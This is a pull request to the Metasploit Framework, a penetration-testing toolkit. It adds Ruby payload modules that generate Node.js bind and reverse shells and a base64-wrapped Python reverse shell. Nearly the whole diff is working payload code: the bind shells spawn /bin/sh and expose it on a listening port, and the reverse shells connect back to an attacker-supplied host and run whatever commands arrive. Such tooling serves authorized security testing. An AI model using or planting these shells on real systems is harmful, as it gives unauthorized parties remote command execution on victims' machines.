### PR TITLE
Add JS shells from evilpacket and python rev shell

### DIFF
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@@ -479,4 +479,20 @@ class Msf::Module::Platform
 		Rank = 100
 		Alias = "php"
 	end
+
+        #
+        # JavaScript
+        #
+        class JavaScript < Msf::Module::Platform
+                Rank = 100
+                Alias = "js"
+        end
+
+        #
+        # Python
+        #
+        class Python < Msf::Module::Platform
+                Rank = 100
+                Alias = "python"
+        end
 end

--- a/modules/payloads/singles/js/shell_bind_tcp.rb
+++ b/modules/payloads/singles/js/shell_bind_tcp.rb
@@ -1,0 +1,66 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Command Shell, Bind TCP (via JS)',
+			'Description'   => 'Creates an interactive shell via JS',
+			'Author'        => [
+        'RageLtMan', # Port to MSF
+        'evilpacket' # Original shell at https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
+        ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'js',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'js',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd   = <<EOS
+var net = require("net"),
+util = require("util"),
+spawn = require("child_process").spawn,
+sh = spawn("/bin/sh",[]);
+var server = net.createServer(function (c) {
+        c.pipe(sh.stdin);
+        util.pump(sh.stdout,c);
+});
+server.listen(#{datastore['LPORT']}, "0.0.0.0");
+EOS
+    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+  end
+end

--- a/modules/payloads/singles/js/shell_bind_tcp_ipv6.rb
+++ b/modules/payloads/singles/js/shell_bind_tcp_ipv6.rb
@@ -1,0 +1,66 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Command Shell, Bind TCP (via JS)',
+			'Description'   => 'Creates an interactive shell via JS',
+			'Author'        => [
+        'RageLtMan', # Port to MSF
+        'evilpacket' # Original shell at https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
+        ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'js',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::BindTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'js',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd   = <<EOS
+var net = require("net"),
+util = require("util"),
+spawn = require("child_process").spawn,
+sh = spawn("/bin/sh",[]);
+var server = net.createServer(function (c) {
+        c.pipe(sh.stdin);
+        util.pump(sh.stdout,c);
+});
+server.listen(#{datastore['LPORT']}, "::");
+EOS
+    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+  end
+end

--- a/modules/payloads/singles/js/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/js/shell_reverse_tcp.rb
@@ -1,0 +1,76 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Command Shell, Reverse TCP (via JS)',
+			'Description'   => 'Creates an interactive shell via JS',
+			'Author'        => [
+        'RageLtMan', # Port to MSF
+        'evilpacket' # Original shell at https://github.com/evilpacket/node-shells/blob/master/node_revshell.js
+        ],
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'js',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'js',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+
+ 		lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
+		cmd   = <<EOS
+var net = require("net");
+util = require("util");
+spawn = require("child_process").spawn;
+sh = spawn("/bin/sh",[]);
+HOST="#{lhost}";
+PORT="#{datastore["LPORT"]}";
+function c(HOST,PORT) {
+    var client = new net.Socket();
+    client.connect(PORT, HOST, function() {
+        client.pipe(sh.stdin);
+        util.pump(sh.stdout,client);
+    });
+    client.on("error", function(e) {
+        setTimeout(c(HOST,PORT), 5000);
+    });
+}
+c(HOST,PORT);
+EOS
+    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+  end
+end

--- a/modules/payloads/singles/python/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/python/shell_reverse_tcp.rb
@@ -1,0 +1,76 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Single
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'          => 'Unix Command Shell, Reverse TCP (via Python loop)',
+			'Version'       => '$Revision$',
+			'Description'   => 'Creates an interactive shell via python, encodes with base64 by design.',
+			'Author'        => 'RageLtMan',
+			'License'       => BSD_LICENSE,
+			'Platform'      => 'python',
+			'Arch'          => ARCH_CMD,
+			'Handler'       => Msf::Handler::ReverseTcp,
+			'Session'       => Msf::Sessions::CommandShell,
+			'PayloadType'   => 'python',
+			'Payload'       =>
+				{
+					'Offsets' => { },
+					'Payload' => ''
+				}
+			))
+	end
+
+	#
+	# Constructs the payload
+	#
+	def generate
+		vprint_good(command_string)
+		return super + command_string
+	end
+
+	#
+	# Returns the command string to use for execution
+	#
+	def command_string
+		cmd = ''
+		dead = Rex::Text.rand_text_alpha(2)
+		# Set up the socket
+		cmd += "import socket,subprocess,os\n"
+		cmd += "s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n"
+		cmd += "s.connect(('#{datastore['LHOST']}',#{datastore['LPORT']}))\n"
+		# The actual IO
+		cmd += "#{dead}=False\n"
+		cmd += "while not #{dead}:\n"
+		cmd += "\tdata=s.recv(1024)\n"
+		cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n"
+		cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n"
+		cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n"
+		cmd += "\ts.send(stdout_value)\n"
+
+		# The *nix shell wrapper to keep things clean
+		# Base64 encoding is required in order to handle Python's formatting requirements in the while loop
+		cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))"
+		return cmd
+
+	end
+
+end


### PR DESCRIPTION
This commit adds the javascript node bind and reverse shells from
https://github.com/evilpacket/node-shells. Flavors are bind, bind6,
and reverse tcp. Alongside the JS shells comes a reverse_tcp shell
for python language injection.
